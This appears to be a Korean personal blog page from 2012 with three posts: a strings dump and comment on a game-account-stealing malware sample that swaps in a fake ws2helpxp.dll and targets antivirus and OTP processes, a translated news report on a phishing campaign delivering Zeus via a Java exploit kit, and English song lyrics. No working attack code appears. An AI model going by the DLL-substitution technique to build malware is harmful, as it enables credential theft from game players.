ws2helpxp.dll  WahCloseApcHelper   WahCloseHandleHelper    WahCloseNotificationHandleHelper    WahCloseSocketHandle    WahCloseThread  WahCompleteRequest  WahCreateHandleContextTable WahCreateNotificationHandle WahCreateSocketHandle   WahDestroyHandleContextTable    WahDisableNonIFSHandleSupport   WahEnableNonIFSHandleSupport    WahEnumerateHandleContexts  WahInsertHandleContext  WahNotifyAllProcesses   WahOpenApcHelper    WahOpenCurrentThread    WahOpenHandleHelper WahOpenNotificationHandleHelper WahQueueUserApc WahReferenceContextByHandle WahRemoveHandleContext  WahWaitForNotification  cationHandleHelper  c : \ W i n d o w s \ c o m     WSPStartup  ws2help.dll alyac   sgrun.exe   


전형적인 게임 탈취 목적으로 보이는 악성코드 같이 보인다! 

특히 ws2helpxp.dll로 바꿔치기하는 전형적인 방법이 아직도 쓰이는걸 보니...

아직도 꽤 많은 이용자가 이 방법을 통해 유출이 되는거 같다! 게임탈취뿐 아니라 OTP에 백신까지도

정말 생각을 많이 하는거 같다!


이제는 사후가아닌 사전에 막는것이 되어서 사용자가 이런일이 없도록 방지하는 방법이 정착이 되었으면 한다!


PS. 올만에 실행시켰더니 ㅠㅠㅠㅠㅠ 버벅버벅 힘들다 ㅠㅠㅠㅠ


posted by Kwan's 2012.09.16 19:30


가짜 Microsoft Service Agreement 이메일에 숨어있는 Java 보안 결함에 대한 공격

온라인 스캐머들이 취약한 시스템에 악성 프로그램을 설치하기 위해 Oracle의 Java 소프트웨어 취약성을 악용하는 널리 퍼진 스팸 캠페인의 미끼로 Microsoft가 보내는 최신 이메일을 사용합니다.

SANS 연구소의 인터넷 스톰 센터(Internet Storm Center) 전문가들은 오퍼레이터들이 어리석은 사용자들에게 Hotmail과 Skydrive와 같은 제품에 대한 서비스 협약(Services Agreement)의 변경에 관한 내용을 담고 있는 Microsoft의 최신 이메일을 이용한 스팸 캠페인에 대해 여러 가지 보고서를 받았다고 경고하였습니다.

그 공격은 치명적인 보안 결함을 수정하기 위한 Oracle 사로부터의 새로운 업데이트인 척하며 인터넷 사용자들의 시스템에서 Java를 [사용안함]으로 하려고 사용자들에게 새로운 요구사항을 촉구하였습니다.

SANS에 따르면, 그 악성 이메일은 8월27일 'Important Changes to Microsoft Services Agreement and Communication Preferences.'이란 제목으로 Microsoft로 부터 발송된 것에 근거한 것입니다.

ISC 참모 Russ McRee가 9월1일 포스트에서 경고했듯이, 피싱 이메일은 눈치 채지 못하는 독자들에게 보내는 악성 링크를 지닌 원문의 링크를 Zeus 맬웨어의 새로운 변종을 설치하는 웹사이트로 대체합니다.

8월27일자의 실제 Microsoft 메시지는 여기에서 볼 수 있습니다.

그것은 Hotmail, Windows Live Messenger, Microsoft Photo Gallery 및 Microsoft의 저장 서비스인SkyDrive를 포함한 광범위한 제품 사용자들에 대한 서비스 협약(service agreement)면에서의 세세한 변화를 담고 있습니다.

의문의 악성 웹사이트에는 보안이 취약한 컴퓨터에 대한 맥가이버 칼(스위스 군사용 칼)과 같은 Blackhole Exploit Kit의 최신 버전이 작동하고 있습니다.

Blackhole Exploit Kit은 익스플로잇 킷이 설치된 웹사이트를 방문한 컴퓨터에 설치된 소프트웨어와 환경설정을 분석할 수 있으며, 의도된 타깃에 대해서만 작동할 것 같은 익스플로잇만 제공합니다.

보안업체 시큐러트(Seculert)의 자료에 따르면, Java 취약성에 대해 최근에 추가된 익스플로잇 코드는 몇 천 몇 만개의 새로운 시스템을 감염시키는 블랙홀 익스플로잇의 성공률을 2배 이상으로 만들었습니다.

이번이 Java 취약점을 공격하기 위해 링크된 첫 번째 피싱 이메일은 아닙니다. 지난주, 소포스랩 전문가들은 Java 결함을 악용하는 웹사이트에 포함된 링크가 세율인상에 대한 정보를 담고 있는 척하는 악성 이메일을 발견하였습니다.

데이터베이스 업계의 거두인 Oracle은 2009년에 Sun Microsystems를 사들였을 때 Java를 인수하였고, 이전에 유비쿼터스 웹 기술에 있어서 보안 취약점에 빠르게 응대하지 못한 것에 대해 보안 전문가들로부터 비평을 받았습니다.

최근의 보안 결함은 회사 이미지를 향상시키지 못했습니다. 지난주에 Java 보안 결함에 대해 억지로 서둘러 패치를 내놓았고, 폴란드 보안 컨설팅 업체인 Security Explorations이 4개월 전인 4월에 Oracle에 대한 치명적인 보안 결함을 보도했던 것이 밝혀진 이후 맥 빠지게 하는 비평을 받았습니다.

Oracle이 결함을 고치기 위해 패치를 발표하였지만 그 보안 결함을 완전히 없애지 못하였기 때문에 회사의 이미지는 더욱 더 손상되었습니다. 패치된 Java 7 버전이 실행되는 시스템은 “완전한 Java 샌드박스 바이패스(sandbox bypass)”를 허용하는 초기 버전과 유사한 형태로 피해갈 수 있다고 Oracle이 지난 금요일에 공지하였다고 Security Explorations은 밝혔습니다.

Oracle이 그 보고를 받은 것을 확인하고 조사에 착수했다고 Security Explorations이 전했습니다.
그러는 동안, ISC 등은 사용자들에게 다음 업데이트가 준비될 때까지 Java를 [사용안함]으로 설정하라고 권고하고 있습니다.

Java를 계속해서 사용해야 하는 이들을 위해, SANS ISC는 이메일 수신인이 그 링크를 클릭하기 전에 마우스 커서를 링크에 올려놓고 의심스러운 메시지에 대해 이메일 헤더를 살펴봄으로써 모든 이메일 메시지에 있는 하이퍼링크를 유심히 살펴봐야 한다고 전했습니다.

소포스 전문가 Paul Ducklin과 Chet Wisniewski는 최신 테크나우(Technow) 팟캐스트 'Java에 대한 모든 것(All about Java)'에서 Java에 대한 좀 더 이해하기 쉬운 충고를 제안합니다.


posted by Kwan's 2012.08.12 16:39

Outasight - Now Or Never


발매 : 2012.5.11


Outasight 의 Tonight Is The Night 이후의 

발표한 싱글앨범 Now Or Never

Outasight 만의 매력과 신나는 박자로 가만이 있어도 흥이나는 노래 입니다 !




 




And I can’t believe forever it seems to live out these dreams


When you start to think about taking a chance you can’t give a damn


Huh I’m a hopeless romantic fell in love with a simple idea with a little bit luck and a whole lotta work I can make everyone of these visions real


So we don’t care what the people say and we don’t care what they want to do and we don’t care about it anymore we do what we want I ain’t wasting a no more time its now or never I’m about to get mine It’s now or never I’m about to get mine It’s now or never


Whoaaaaaaaaaaaaaaaaaaaaa It’s now or never Whoaaaaaaaaaaaaaaaaaa It’s now or never.


We don’t care what the people say and we don’t care what they want to do and we don’t care about it anymore we do what we want I ain’t wasting a no more time its now or never I’m about to get mine It’s now or never I’m about to get mine It’s now or never


It’s time to decide if its worth the fight or letting it slide


And I drew the line at wasting away or waiting to be saved


Yay y’all made my own luck in my head on straight and kicked up the dust


And the money well it don’t mean much I did it for the love and that was enough


The way I dreamed it ain’t the way it played out missed every road that looked to be the safe route. No directions I made my way out I don’t give a damn what they say no way now.


We don’t care what the people say and we don’t care what they want to do and we don’t care about it anymore we do what we want I ain’t wasting a no more time its now or never I’m about to get mine It’s now or never I’m about to get mine It’s now…. Whoaaaaaaaaaaaaaaaaaaaaa It’s now or never Whoaaaaaaaaaaaaaaaaaa It’s now or never.


We don’t care what the people say and we don’t care what they want to do and we don’t care about it anymore we do what we want I ain’t wasting a no more time its now or never I’m about to get mine It’s now or never I’m about to get mine It’s now or never.


I’m about to get mine mine mine Its about that time


We don’t care what the people say and we don’t care what they want to do and we don’t care about it anymore we do what we want I ain’t wasting a no more time its now or never I’m about to get mine It’s now or never I’m about to get mine It’s now or never.


Whoaaaaaaaaaaaaaaaaaaaaa It’s now or never Whoaaaaaaaaaaaaaaaaaa It’s now or never.


We don’t care what the people say and we don’t care what they want to do and we don’t care about it anymore we do what we want I ain’t wasting a no more time its now or never I’m about to get mine It’s now or never I’m about to get mine It’s now or never